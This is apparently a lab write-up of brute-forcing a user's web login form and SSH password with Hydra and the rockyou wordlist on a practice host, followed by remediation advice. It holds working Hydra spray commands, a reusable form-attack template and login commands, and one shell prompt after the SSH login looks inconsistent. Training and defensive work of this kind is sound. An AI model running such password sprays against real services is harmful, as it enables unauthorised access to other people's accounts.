Case file

Hydra HTTP-POST form and SSH password spray for Molly

Foundations network engagement: Hydra sprayed rockyou against Molly’s web login and SSH; both surfaces fell to weak passwords and yielded distinct engagement artifacts.

Foundations14 minBrute Force · Hydra · SSH · Web Authentication
  • http-post-form module cracked Molly’s web password; ssh module cracked her SSH password; both secrets were in rockyou.

  • Hydra http-post-form against /login/ recovered Molly’s web password from rockyou.

  • Hydra ssh module recovered Molly’s SSH password; authenticated shell confirmed second artifact.

01

Engagement summary

http-post-form module cracked Molly’s web password; ssh module cracked her SSH password; both secrets were in rockyou.

HYDRA tested credential spraying against a dual-surface host: a web login form and OpenSSH for user molly. With rockyou and fifty parallel tasks, hydra’s http-post-form module targeted /login/ with username/password fields and failure string incorrect — recovering the web password and the first artifact. The same username and wordlist against ssh:// recovered a second password and SSH access. No MFA, no lockout, shared weak dictionary passwords across channels.

Business impact

Identical weak passwords on web and SSH multiply exposure. Without rate limits or account lockout, dictionary sprays succeed in minutes. Enforce unique strong secrets per service, MFA on remote access, and alert on distributed auth failures.

02

HTTP POST form spray

Hydra http-post-form against /login/ recovered Molly’s web password from rockyou.

OPERATOR · HYDRA WEB

savvy@lab:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login/:username=^USER^&password=^PASS^:F=incorrect" -t 50

[80][http-post-form] host: 10.10.10.10 login: molly password: ********

savvy@lab:~$ curl -s -X POST http://10.10.10.10/login/ -d 'username=molly&password=********'

authenticated — web flag recovered

HYDRA MODULE

hydra-http-post.txt

hydra -l USER -P WORDLIST TARGET \
  http-post-form "/path/:user=^USER^&pass=^PASS^:F=fail_string" -t 16
03

SSH password spray

Hydra ssh module recovered Molly’s SSH password; authenticated shell confirmed second artifact.

OPERATOR · HYDRA SSH

savvy@lab:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10 -t 50

[22][ssh] host: 10.10.10.10 login: molly password: ********

savvy@lab:~$ ssh molly@10.10.10.10

molly@10.10.10.10's password: ******** savvy@lab:~$ cat ~/flag.txt

Remediation

Disable password SSH where possible; mandate keys and MFA. On web forms, progressive delays, CAPTCHA after N failures, and monitoring for hydra-like parallel attempt patterns. Ban rockyou and other breach corpora at password set time.